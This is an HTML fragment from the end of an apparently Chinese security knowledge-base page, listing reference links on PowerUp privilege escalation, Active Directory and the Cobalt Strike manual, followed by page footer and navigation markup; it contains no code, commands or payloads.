d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://wooyun.js.org/drops/Powershell%20%E6%8F%90%E6%9D%83%E6%A1%86%E6%9E%B6-Powerup.html" target="_blank" rel="noopener noreferrer">https://wooyun.js.org/drops/Powershell%20%E6%8F%90%E6%9D%83%E6%A1%86%E6%9E%B6-Powerup.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://docs.microsoft.com/zh-cn/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview" target="_blank" rel="noopener noreferrer">https://docs.microsoft.com/zh-cn/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a 
href="https://blog.ateam.qianxin.com/CobaltStrike4.0%E7%94%A8%E6%88%B7%E6%89%8B%E5%86%8C_%E4%B8%AD%E6%96%87%E7%BF%BB%E8%AF%91.pdf" target="_blank" rel="noopener noreferrer">https://blog.ateam.qianxin.com/CobaltStrike4.0%E7%94%A8%E6%88%B7%E6%89%8B%E5%86%8C_%E4%B8%AD%E6%96%87%E7%BF%BB%E8%AF%91.pdf<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p></blockquote></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/tools/burpsuite.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
  </body>
</html>